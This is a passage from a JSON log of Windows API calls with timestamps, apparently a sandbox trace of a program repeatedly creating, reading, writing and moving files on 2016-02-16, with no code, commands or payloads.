"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,233", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,293", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,323", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,393", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,403", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,463", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,553", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtWriteFile"}, {"category": 